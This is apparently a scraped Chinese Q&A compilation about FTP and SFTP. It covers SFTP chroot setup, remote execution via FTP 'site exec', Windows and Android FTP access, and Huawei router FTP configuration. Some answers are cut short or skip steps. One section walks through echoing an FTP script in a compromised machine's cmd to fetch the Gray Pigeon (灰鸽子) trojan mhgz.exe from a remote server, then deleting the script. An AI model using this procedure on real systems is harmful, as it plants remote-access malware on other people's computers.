ftp远程文件
众所周知SFTP账号是基于SSH账号的,所以在默认情况下访问服务器的权限是非常大的。下面为SFTP用户权限设置方法。
必要条件:
你的openssh-server版本至少得失4.8p1, 因为配置权限需要版本添加的新配置项ChrootDirectory来完成。
如何查看自己服务器上的ssh版本?大家可以尝试以下命令:
$ ssh -V
具体实施步骤:
1. 我们需要创建一个用户组,专门用于sftp用户
$ groupadd sftpusers
2. 我们创建一个用户test
$ useradd -s /bin/false -G sftpuser test
注意这里我们将test用户的shell设置为/bin/false使他没有登陆shell的权限
3. 编辑 /etc/ssh/sshd_config
找到Subsystem这个配置项,将其修改为
Subsystem sftp internal-sftp
然后再到文件最尾处增加配置设定属于用户组sftpusers的用户都只能访问他们自己的home文件夹
Match Group sftpusers
ChrootDirectory %h
ForceCommand internal-sftp
AllowTcpForwarding no
保存并关闭文件
4. 修改test用户home文件夹的权限,让其属于root用户
chown root ~test
5. 重启sshd服务
$ service sshd restart
6. 测试用户账号
$ ssh test@localhost
连接会被拒绝或者无法登陆
$ sftp tesst@localhost
登陆后你会发现你的账号无法切换到除自己home目录之外的地方的
常见问题:
如果你链接服务器的时候出现下面的提示:
Write failed: Broken pipe
Couldn't read packet: Connection reset by peer
这个问题的原因是ChrootDirectory的权限问题,你设定的目录必须是root用户所有,否则就会出现问题。所以请确保sftp用户根目录的所有人是root, 权限是 750 或者 755。
2. 命令行登录FTP下,如何远程执行服务器上的可执行文件不是在本机执行,而是远程执行,命令是什么呢。求高
ftp是可以远程执行文件的,前提条件是你登陆的用户拥有“执行”权限,具体命令是:
quote
site
exec
*.exe
(你要执行的exe文件,bat也可以)。
说ftp不能执行是对ftp协议本身不够了解,其实用过ftp服务器端软件(例如serv-u)的人一定注意过,在设置用户权限的时候有一项是“执行”,如果这一项选中,那么本用户就拥有了执行远程服务器程序的权限。然而使用很多ftp客户端软件执行命令的时候都是在本地执行的,所以让很多人误解ftp不能在远程执行,这是客户端软件的问题,与ftp协议无关。所以用以上命令在命令行是能够在远程计算机执行命令的。
另外说ftp执行是漏洞,这也是片面的。实际应该是ftp协议本身提供执行的命令,但是这本身是非常不安全的,做为操作系统(甚至所有服务器端软件)应该将这种权限设为对一般客户不可见。只有特殊权限的用户才能访问,这样才是软件本身应提供的功能。
3. 安卓手机如何通过ftp远程连接电脑,并传输文件。
安卓手机通过ftp远程连接电脑,并传输文件步骤如下:
1、网络搜索FileZilla进行下载。
4. win7 如何象本地目录一样打开远程ftp文件
win7像本地目录一样打开远程ftp文件方法:
1.
首先打开电脑右下角的开始菜单,选择里面的设置菜单,然后选择控制面板。
2.
选择internet选项。右边的高级菜单。
3.
选择启用ftp文件夹视图即可,然后就可远程查看。
5. 远程计算机怎么用FTP传文件啊
在远程计算机的cmd环境下,如果不能通过ipc$渠道传送文件,那就只有通过ftp下载文件了。
假设我们已经有一个ftp服务器,上面有一个我们配置好的灰鸽子木马文件mhgz.exe,我们应该知道ftp服务器的三个参数:
1、ftp服务器的ip地址:如203.75.44.34
2、ftp服务器的用户名:如tty
3、ftp服务器的密
码:如tty123
在远程计算机的cmd下依次输入下面的命令:
1、echo
open
203.75.44.34>>tty.txt
登陆ftp服务器
2、echo
tty>>tty.txt
用户名
3、echo
tty123>>tty.txt
密码
4、echo
bin>>tty.txt
开始
5、echo
get
mhgz.exe>>tty.txt
下载灰鸽子木马
6、echo
bye>>tty.txt
关闭ftp服务器
输入上面命令后,在远程计算机上就会生成一个tty.txt文件,内容为:
open
203.75.44.34
tty
tty123
bin
get
mhgz.exe
bye
现在我们在远程计算机上执行下面的命令:
ftp
-s:tty.txt
意思是,读取tty.txt里的参数,执行ftp命令,命令执行完后,灰鸽子木马文件mhgz.exe就下载到对方计算机里了。
del
c:\tty.txt
6. 怎么把本地文件传到远程ftp
1、首先需要在本地设置一个FTP站点
(1)我的电脑——》管理——》本地用户和组——》用户——》新增用户,即设置FTP登录的用户名和密码
(5)最后就可以测试刚才建立的ftp服务器是否建立成功了。在浏览器上输入以下地址ftp://设置站点时ip(在此为本地ip) 即可打开具有上传功能的FTP页面,输入ftp://设置站点时ip(在此为本地ip):2121即可打开只有下载功能的页面了!当然,登录之前还需要你输入开始建立的那个账号及密码:用户名为:。密码为:XXXXXX
这样你需要建立的ftp服务器就建立成功了
7. FTP原理与配置
FTP是用来传送文件的协议。使用FTP实现远程文件传输的同时,还可以保证数据传输的可靠性和高效性。
在企业网络中部署一台FTP服务器,将网络设备配置为FTP客户端,则可以使用FTP来备份或更新VRP文件和配置文件。 也可以把网络设备配置为FTP服务器,将设备的日志文件保存到某台主机上方便查看。
FTP传输数据时支持两种传输模式:ASCII模式和二进制模式。
ASCII模式用于传输文本。 发送端的字符在发送前被转换成ASCII码格式之后进行传输,接收端收到之后再将其转换成字符。 二进制模式常用于发送图片文件和程序文件。 发送端在发送这些文件时无需转换格式,即可传输。
使用FTP进行文件传输时,会使用两个TCP连接。 第一个连接是FTP客户端和FTP服务器间的控制连接。 FTP服务器开启21号端口 ,等待FTP客户端发送连接请求。
第二个连接是FTP客户端和FTP服务器间的数据连接。 服务器使用TCP的20号端口 与客户端建立数据连接。 通常情况下,服务器主动建立或中断数据连接。
执行 ftp server enable 命令使能FTP功能。
执行 set default ftp-directory 命令设置FTP用户。
在配置FTP服务器时,可以使用AAA为每个用户分别配置登录账号和访问权限。
aaa 命令用来进入AAA视图。
local-user user-name { access-limit max-number | ftpdirectory directory | idle-timeout minutes [ seconds ] | password cipher password [ opt ]| privilege level level | state {active | block } } *命令用来创建本地用户,并配置本地用户的各项参数。
ftp客户端连接ftp服务器
ftp命令用来不远程FTP服务器建立控制连接,并进入FTP客户端视图。
binary命令用来在设备作为FTP客户端时设置文件传输方式为Binary模式,又称二进制模式。缺省情况下,文件传输方式为ASCII模式。get命令用来从远程FTP服务器下载文件并保存在本地。
8. ftp怎么登录连接
ftp怎么登录连接
在windows系统中,我们可以通过登录连接ftp的方法进行远程文件的转移和操作,还可以与好友或其他设备共享文件,那么ftp怎么登录连接呢,其实只要输入地址即可。
5、登录连接完成后,就能查看和编辑其中的文件了。